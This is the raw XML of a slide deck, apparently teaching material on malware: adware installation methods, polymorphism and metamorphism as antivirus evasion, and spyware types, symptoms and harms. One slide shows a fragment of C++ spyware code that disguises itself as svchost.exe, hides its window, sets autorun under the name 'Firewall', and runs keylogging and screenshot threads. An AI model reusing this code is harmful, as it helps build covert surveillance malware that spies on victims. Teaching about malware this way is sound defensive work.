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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId51"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId49"/>
    <p:sldId id="263" r:id="rId50"/>
    <p:sldId id="665" r:id="rId52"/>
    <p:sldId id="643" r:id="rId53"/>
    <p:sldId id="644" r:id="rId54"/>
    <p:sldId id="767" r:id="rId55"/>
    <p:sldId id="768" r:id="rId56"/>
    <p:sldId id="769" r:id="rId57"/>
    <p:sldId id="729" r:id="rId58"/>
    <p:sldId id="771" r:id="rId59"/>
    <p:sldId id="666" r:id="rId60"/>
    <p:sldId id="691" r:id="rId61"/>
    <p:sldId id="690" r:id="rId62"/>
    <p:sldId id="772" r:id="rId63"/>
    <p:sldId id="751" r:id="rId64"/>
    <p:sldId id="689" r:id="rId65"/>
    <p:sldId id="693" r:id="rId66"/>
    <p:sldId id="703" r:id="rId67"/>
    <p:sldId id="696" r:id="rId68"/>
    <p:sldId id="697" r:id="rId69"/>
    <p:sldId id="698" r:id="rId70"/>
    <p:sldId id="699" r:id="rId71"/>
    <p:sldId id="700" r:id="rId72"/>
    <p:sldId id="637" r:id="rId73"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId77"/>
    </p:embeddedFont>
  </p:embeddedFontLst>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8BE"/>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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag343.xml"/><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24.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.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image" Target="../media/image5.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image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag279.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag278.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag299.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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tags" Target="../tags/tag304.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><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tags" Target="../tags/tag30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308.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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media/image12.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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32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31.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag330.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag342.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag277.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329565" y="1035685"/>
            <a:ext cx="11532870" cy="9940290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>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 0)) {//exist?</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(_access("C:\\Users\\Public\\Public\\Screens", 0)) {</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_mkdir("C:\\Users\\Public\\Public\\Screens");</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 =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wstring stemp = wstring(s.begin(), s.end());</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LPCWSTR path = stemp.c_str();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CopyFile(path, L"C:\\Users\\Public\\Public\\svchost.exe", TRUE);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>//Copies an existing file to a new file in order to hide itself.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screen = "C:\\Users\\Public\\Public\\Screens\\screenshot.bmp";</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char* bmp = new char[screen.size() + 1];</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strcpy(bmp, screen.c_str());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util.HideConsole();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>//hide the window</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//util.Autoload("hack.exe",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util.Autoload("Firewall", "C:\\Users\\Public\\Public\\svchost.exe")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>;//hide itself from firewall</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util.Screenshot(0, 0, 1920, 1080, (char*)(bmp), NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>;//screen shot</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logger(logger);</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screens(screens);</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(logger.joinable())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logger.join();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>//finish its execution before continuing with the rest of the program</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(screens.joinable())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screens.join();</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delete[] bmp;</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04259 "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Adware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Adware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4" name="组合 33" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132205" y="1593850"/>
            <a:ext cx="9927590" cy="4030980"/>
            <a:chOff x="1783" y="2050"/>
            <a:chExt cx="15634" cy="6348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1783" y="2050"/>
              <a:ext cx="15635" cy="6349"/>
              <a:chOff x="998510" y="1183843"/>
              <a:chExt cx="9928225" cy="4031615"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Freeform 215"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId1"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="998510" y="1333068"/>
                <a:ext cx="9928225" cy="3882390"/>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4" name="Rectangle 216"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId2"/>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1" name="Rectangle 218"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId3"/>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6" name="Freeform 219"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>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8" name="Freeform 220"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>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0" name="Freeform 221"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>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3" name="Freeform 222"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>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9" name="Freeform 223"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>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pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="图形 17" descr="templates\docerresourceshop\icons\\32313535373331353b32313535373332313bc8cbb9a4d6c7c4dcbbfac6f7c8cb"/>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9804055" y="4285183"/>
                <a:ext cx="930275" cy="930275"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31"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2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1783" y="3134"/>
              <a:ext cx="15383" cy="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4500"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1500"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzPct val="200000"/>
                <a:buFontTx/>
                <a:buBlip>
                  <a:blip r:embed="rId1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Adware is a type of software that displays advertisements on a computer or mobile device. Adware is typically installed along with free software and can be difficult to remove once it is on a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Install-Drive-by-downloading</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usage of drive by downloading is the other misleading methods utilized by adware developers. Drive by downloaded is the act of provoking an individual to install software when the user browses the website without the individual in fact wishing</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to</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setup different software at the beginning.</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Install-Continues Prompt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78" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695643" y="1355090"/>
            <a:ext cx="10800715" cy="4051300"/>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2"/>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07A7A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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="4841875"/>
            <a:ext cx="1157605" cy="1620520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 63490" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483870" y="1831975"/>
            <a:ext cx="1053719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10000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pP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writer uses continu</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ous</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prompting till the individuals give up and agree to install</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software</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Install-Bundled and Chained Installment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7167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Bundling adware with a third party program is another widespread way. The technique of installing additional software is named as chained installs. The vast majority of people dislike adware but why such businesses use bundling technique in their application. The answer is profit. For instance, the amount of money could be from pennies to 0.25 dollars for each installment.</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Install-Exploits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397383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users sometimes install some adware on their computers without their permission. That happens by abusing weaknesses in browsers that permit adware to be installed and run in an automatic way. The program downloaded consists of some piece of components that change the browser home page, show advertisements, and alter way of</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searching results, monitor individual computer behaviors.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Install-Load Points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3674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adware is set up on a computer, they need to make sure that they start when the system begins all the time. Some operat</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ing</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systems offer load points at different times throughout computer startup. There are load points for operating systems’ starts, when the user logs in, when browser executes, and when programs execute. adware can employ a load point as a minimum to make sure continuity via restarts.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5" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="203200" y="1113790"/>
            <a:ext cx="11568430" cy="522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Performance degradation:</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slow down a computer's performance and consume system resources, which can result in slow and unresponsive systems.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Annoying and distracting ads:</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display pop-up ads, banners, and other types of advertisements, which can be distracting and annoying to users.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Privacy invasion</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collect information about a user's online activities, including their browsing history, search terms, and geolocation information, which can be used to deliver targeted ads. This can result in a loss of privacy.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Increased risk of malware:</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have been found to be bundled with malware, such as spyware and Trojans, which can cause further harm to a system.</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Polymorphism and Metamorphism</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Adware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Polymorphism and Metamorphism</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Spyware </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Polymorphism</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955040" y="1355090"/>
            <a:ext cx="10281920" cy="3818890"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 16295"/>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3"/>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A728BE"/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="934085" y="1789430"/>
            <a:ext cx="1006221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500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>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Polymorphism is an evasion mechanism used by malware to evade detection by anti-virus products. Polymorphic malware is designed to change its appearance or behavior in order to evade detection. The malware modifies its code, file structure, or encryption method each time it is executed, making it difficult for anti-virus products to identify it.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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="5021965"/>
            <a:ext cx="1029547" cy="144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84910"/>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techniques such as code encryption, code packing, and code mutating to make the malware code appear different from one instance to another, while still performing the same malicious actions.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packing:</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software that compresses and encrypts a malware executable into a single file, making it difficult for anti-virus software to detect.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mutation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making small modifications to the malware executable file, such as changing its size, timestamp, or adding junk data. This can make it difficult for signature-based anti-virus software to detect the malware, as its signature will be different from one instance to another.</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Metamorphism</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13386"/>
            <a:ext cx="11568430" cy="493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Malware metamorphism refers to the ability of a malware to modify its own code in a way that makes it difficult for anti-virus software to detect it. Metamorphic malware changes its codes each time it is executed, while retaining its core functionality.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 Metamorphism focuses on changing the code of the malware to evade detection while polymorphism focuses on changing the appearance of the malware to evade signature-based anti-virus software. However, it is also a more effective technique for evading anti-virus software, as it makes it difficult for security researchers to analyze and track the malware.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25418"/>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using various methods to make the code of the malware difficult to understand and analyze. This includes techniques such as code substitution.</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Dynamic Code Generation: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generating new code each time the malware is executed. The generated code retains the functionality of the original code, but is structurally different, making it difficult for anti-virus software to detect the malware.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Instruction Substitution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modifying the code of the malware to use different machine instructions, while retaining its functionality. This makes it difficult for anti-virus software to detect the malware, as the code signatures generated by these different instructions are unique.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Spyware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474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Application that send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>s information from your computer to the creator of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Sometimes consists of an apparent core functionality and a hidden functionality of information gathering (Trojan)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be used by websites for marketing information, to determine their stance with regard to competitors and market trends </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also be used to log keystrokes and send those to whomever</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Software installed on a computer without the user's knowledge which gathers information about that user for later retrieval by whomever controls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Spyware can be broken down into two different categories:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="3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surveillance spyware </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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advertising spyware.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38100" indent="0">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0"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Surveillance software:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Includes key loggers, screen capture devices, and Trojans. These would be used by corporations, private detectives, law enforcement, intelligence agencies, suspicious spouses.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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Advertising spyware:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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Software that is installed alongside other software, often without the user's knowledge, or without full disclosure that it will be used for gathering personal information and/or showing the user ads.</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 Advertising spyware logs information about the user, possibly including passwords, email addresses, web browsing history, online buying habits, the computer's hardware and software configuration, the name, age, gender,etc.</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endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="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Computers Get Infected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Basic forms of spyware can be picked up simply by visiting a Web page.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Spyware may also be picked up through email.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You are particularly likely to be exposed by downloading software, in particular "freeware" and "shareware" offerings.</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Many software downloads are "free," but within the End User License Agreement (EULA) are provisions to use information from your computer or your email and other contact information.  You have to agree to the EULA to download or install, so you essentially agree to allowing someone else to use information about your computer.</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That's why the definition of spyware is "generally without your knowledge or consent."  Often, you've consented.  You just don't realize it because you didn't read the fine print.  This is why the definition of spyware sometimes includes the lawyerism "potentially unwanted technologies."</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="26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Spyware Symptoms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Spyware often operate silently, monitoring your Web surfing activities and reporting back what sites you have visited to a marketing organization.  Others display "pop-up" ads on your computer's desktop or on top of other Web pages.</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More aggressive spyware will reset your browser's home page (the page that appears when the browser starts up), change the service your browser uses for Web searches, or add new sites to your favorites list.  Or produce even more invasive advertisements.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The most damaging spyware programs can actually install "trojans" -- computer programs which allow other people to remotely access an infected computer.  Such spyware programs can run silently "in the background" and are capable of doing anything that a typical computer program can do which does not require your intervention.</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Sometimes a spyware-infected computer will run more slowly due to all the activity going on in the background.  But your computer seems to be running at normal speed, it doesn't mean you are safe.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Increase in system crashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38100" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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4"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152400" y="1113790"/>
            <a:ext cx="1190307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600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15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Spyware can cause a number of negative impacts, including:</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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="544830" y="1678940"/>
            <a:ext cx="11240135" cy="4579620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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Privacy invasion:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Spyware can gather sensitive information, such as login credentials, financial information, and personal data, and transmit it to attackers. This can result in identity theft, financial losses, and a loss of privacy.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Spyware can slow down a computer's performance, as it can consume system resources and interfere with normal system operations.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Unwanted ads:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Spyware can display unwanted ads, pop-ups, and other unwanted content, which can be distracting and annoying to users.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to spread other types of malware, such as viruses and Trojans,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Increased risk of cybercrime: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by attackers to carry out other types of cybercrime, such as phishing scams and identity theft.</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43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ=="/>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10653</Words>
  <Application>WPS Writer</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>208</Paragraphs>
  <Slides>24</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
